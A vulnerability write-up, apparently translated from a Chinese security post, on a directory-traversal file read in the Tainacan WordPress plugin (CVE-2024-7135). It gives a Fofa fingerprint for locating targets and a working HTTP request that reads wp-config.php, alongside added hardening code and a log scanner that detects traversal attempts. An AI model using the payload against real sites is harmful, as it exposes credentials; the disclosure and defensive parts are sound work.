0x00 Introduction
Because every version of the Tainacan plugin for WordPress up to and including 0.21.7 lacks a capability check on the "get_file" function, the plugin is vulnerable to unauthorized data access. The same function is also vulnerable to directory traversal. Together these allow an authenticated attacker (Subscriber-level access and above) to read the contents of arbitrary files on the server, which may contain sensitive information.
Fofa fingerprint: "wp-content/plugins/tainacan/"
First download and install the WordPress plugin Tainacan 0.21.6, then enable the plugin.
WordPress test version: 5.6.1
0x01 Vulnerability analysis
The get_file method of the controller in /wp-content/plugins/tainacan/classes/api/endpoints/class-tainacan-rest-background-processes-controller.php contains an arbitrary file read vulnerability.
register_rest_route($this->namespace, '/' . $this->rest_base . '/(?P<id>[0-9]+)', array(
    array(
        'methods' => WP_REST_Server::EDITABLE,
        'callback' => array($this, 'update_item'),
        'permission_callback' => array($this, 'bg_processes_permissions_check'),
        'args' => [
            'status' => [
                'type' => 'string',
                'description' => __( '"open" or "closed" ', 'tainacan' ),
                'enum' => array(
                    'open',
                    'closed'
                )
            ]
        ],
    ),
));
...
// Vulnerable handler (0.21.7 and earlier): no capability check is performed
// before the file is served.
public function get_file( $request ) {
    if( !isset($request['guid']) ) {
        return new WP_REST_Response([
            'error_message' => __('guid must be specified', 'tainacan' )
        ], 400);
    }
    $guid = $request['guid'];
    $upload_url = wp_upload_dir();
    // $guid is joined to the uploads directory as-is: "../" sequences are not
    // removed and the resulting path is never checked against the base directory.
    $path = $upload_url['basedir'] . '/tainacan/' . $guid;
    if ( file_exists( $path ) ) {
        $finfo = @finfo_open(FILEINFO_MIME_TYPE);
        $mime_type = @finfo_file($finfo, $path);
        $file_name = @basename($path);
        http_response_code(200);
        header('Content-Description: File Transfer');
        header("Content-Disposition: attachment; filename=$file_name");
        header("Content-Type: $mime_type");
        header("Content-Length: " . @filesize( $path ));
        // The unchecked path is streamed straight back to the caller.
        readfile($path);
    } else {
        return new WP_REST_Response("file not found", 404, array('content-type' => 'text/html; charset=utf-8'));
    }
}
The method is reached directly through the REST API endpoint, which is what makes the vulnerability exploitable.
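For comparison, here is a hardened version of the handler and its route registration. This is an added example written for this page, not Tainacan's own code or its actual fix: the capability name 'manage_options', the helper names, and the exact route registration are assumptions. It addresses both defects the analysis above identifies: the missing capability check (via permission_callback) and the unconfined path built from guid (via realpath() plus a prefix check against the plugin's upload directory).

```php
<?php
// Added example, not Tainacan's own code: a hardened get_file handler.
// Assumptions: the capability 'manage_options', the helper names below, and
// the route registration details are illustrative only.

/**
 * Resolve $guid relative to $basedir and confirm the result stays inside it.
 * Returns the canonical path, or null when the file is missing or escapes.
 */
function tainacan_example_resolve_upload_path( string $basedir, string $guid ): ?string {
    // Empty names and NUL bytes are never valid file names.
    if ( $guid === '' || strpos( $guid, "\0" ) !== false ) {
        return null;
    }
    $base = realpath( $basedir );
    if ( $base === false ) {
        return null;
    }
    // realpath() collapses ".." segments and symlinks, so the prefix test below
    // is made on the real location of the file, not on the string the client sent.
    $candidate = realpath( $base . DIRECTORY_SEPARATOR . $guid );
    if ( $candidate === false || ! is_file( $candidate ) ) {
        return null;
    }
    // The canonical file path must begin with the canonical base plus a separator.
    $prefix = rtrim( $base, DIRECTORY_SEPARATOR ) . DIRECTORY_SEPARATOR;
    if ( strncmp( $candidate, $prefix, strlen( $prefix ) ) !== 0 ) {
        return null;
    }
    return $candidate;
}

// WordPress wiring. Guarded so the file also runs under plain PHP CLI for the
// self-check at the bottom. Namespace and base match the URL from the writeup.
if ( function_exists( 'add_action' ) ) {
    add_action( 'rest_api_init', function () {
        register_rest_route( 'tainacan/v2', '/bg-processes/file', array(
            'methods'             => WP_REST_Server::READABLE,
            'callback'            => 'tainacan_example_get_file',
            // The piece the vulnerable version lacked: a real capability check.
            'permission_callback' => function () {
                return current_user_can( 'manage_options' );
            },
        ) );
    } );
}

function tainacan_example_get_file( WP_REST_Request $request ) {
    $guid    = (string) $request->get_param( 'guid' );
    $basedir = wp_upload_dir()['basedir'] . '/tainacan';
    $path    = tainacan_example_resolve_upload_path( $basedir, $guid );
    if ( $path === null ) {
        // Same response for "missing" and "escaped": no information about the tree.
        return new WP_REST_Response( array( 'error_message' => 'file not found' ), 404 );
    }
    header( 'Content-Type: application/octet-stream' );
    header( 'Content-Disposition: attachment; filename="' . basename( $path ) . '"' );
    header( 'Content-Length: ' . filesize( $path ) );
    readfile( $path );
    exit;
}

// Self-check under plain PHP CLI with a constructed temporary upload directory.
if ( PHP_SAPI === 'cli' && ! function_exists( 'add_action' ) ) {
    $tmp  = sys_get_temp_dir() . '/tainacan-example-' . getmypid();
    $base = $tmp . '/tainacan';
    mkdir( $base, 0700, true );
    file_put_contents( $base . '/export.csv', "id,title\n" );
    file_put_contents( $tmp . '/wp-config.php', "<?php // constructed stand-in\n" );

    $ok = tainacan_example_resolve_upload_path( $base, 'export.csv' ) !== null
        && tainacan_example_resolve_upload_path( $base, '../wp-config.php' ) === null
        && tainacan_example_resolve_upload_path( $base, '../../../../etc/passwd' ) === null;
    echo $ok ? "path confinement OK\n" : "path confinement FAILED\n";

    unlink( $base . '/export.csv' );
    unlink( $tmp . '/wp-config.php' );
    rmdir( $base );
    rmdir( $tmp );
}
```

Run it with `php` from the command line to exercise the path-confinement helper against a temporary directory; inside WordPress the same file registers the guarded route. The prefix check is done on the output of realpath(), not on the raw guid, so encoded or symlinked traversal is handled the same way as a literal "../".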
0x02 Reproduction
First register an ordinary user and log in, then obtain the nonce from the site's home page; after that the file can be read directly.
Payload:
GET /wp-json/tainacan/v2/bg-processes/file?guid=../../../wp-config.php&_wpnonce=替换目标网站nonce HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=57p45m6lctlfttfrsjfpk4fui9; wp_lang=zh_CN; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1729391061%7ColYyhIIyEr3yA8JstL99jsKU6rCXsMPR8tQH6nNauzP%7C59e8715eb35b44ed9532e025052b7ef1748b384a9e03a39a9538cd4cd18ffdbe; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26mfold%3Do; wp-settings-time-1=1729218262
Host: 127.0.0.1
Pragma: no-cache
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
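From the defender's side, the request above leaves a recognisable trace in the web-server access log: a hit on the bg-processes/file endpoint whose guid parameter contains a ".." path segment. The following is an added example, not part of the original post, that scans combined-format log lines for that pattern; the endpoint path is the one from the request above, while the log lines, the function names and the sample nonce are constructed for the demonstration. It also covers the `?rest_route=` form of WordPress REST URLs and double URL-encoding, which the writeup's single request does not show.

```php
<?php
// Added example, not part of the original post: flag access-log entries that
// reach the Tainacan background-process file endpoint with a traversal guid.
// Sample log lines at the bottom are constructed.

const TAINACAN_EXAMPLE_ENDPOINT = 'tainacan/v2/bg-processes/file';

/**
 * Returns the offending guid value when $line is a traversal attempt against
 * the endpoint, or null otherwise. Handles both /wp-json/... and the
 * ?rest_route=... URL forms, and single or double URL encoding of guid.
 */
function tainacan_example_flag_log_line( string $line ): ?string {
    // Pull the request target out of a combined-log-format entry.
    if ( ! preg_match( '/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m ) ) {
        return null;
    }
    $target = $m[1];
    $path   = (string) parse_url( $target, PHP_URL_PATH );
    $query  = parse_url( $target, PHP_URL_QUERY );
    $params = array();
    if ( is_string( $query ) ) {
        parse_str( $query, $params );   // parse_str() URL-decodes once
    }
    $route = isset( $params['rest_route'] ) ? (string) $params['rest_route'] : $path;
    if ( strpos( $route, TAINACAN_EXAMPLE_ENDPOINT ) === false ) {
        return null;
    }
    $guid = isset( $params['guid'] ) ? (string) $params['guid'] : '';
    // Decode once more so a double-encoded "../" (%252e%252e%252f) is caught too.
    $decoded = rawurldecode( $guid );
    // A ".." segment with either separator, or a NUL byte, is never a legitimate
    // file name under the plugin's upload directory.
    if ( preg_match( '#(^|[\\\\/])\.\.([\\\\/]|$)#', $decoded ) === 1
        || strpos( $decoded, "\0" ) !== false ) {
        return $guid;
    }
    return null;
}

// Constructed sample lines in combined log format (host matches the writeup).
$tainacan_example_sample_log = array(
    '127.0.0.1 - - [18/Oct/2024:10:00:01 +0000] "GET /wp-json/tainacan/v2/bg-processes/file?guid=../../../wp-config.php&_wpnonce=0123456789 HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [18/Oct/2024:10:00:02 +0000] "GET /wp-json/tainacan/v2/bg-processes/file?guid=export-42.csv&_wpnonce=0123456789 HTTP/1.1" 200 912 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [18/Oct/2024:10:00:03 +0000] "GET /index.php?rest_route=/tainacan/v2/bg-processes/file&guid=%252e%252e%252f%252e%252e%252fwp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [18/Oct/2024:10:00:04 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
);

if ( PHP_SAPI === 'cli' ) {
    foreach ( $tainacan_example_sample_log as $n => $line ) {
        $guid = tainacan_example_flag_log_line( $line );
        if ( $guid !== null ) {
            printf( "line %d: traversal attempt on %s, guid=%s\n", $n + 1, TAINACAN_EXAMPLE_ENDPOINT, $guid );
        }
    }
}
```

A real deployment would read the log from a file or pipe instead of the embedded array, and would also correlate the flagged request with the 200 status and the logged-in cookie, since a successful read by a low-privilege account is the case worth alerting on. Note that the nonce in the URL is not a secret and tells the defender nothing on its own; the traversal sequence in guid is the signal.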
Originally published on the WeChat public account (星悦安全): WordPress Tainacan plugin front-end arbitrary file read vulnerability (CVE-2024-7135)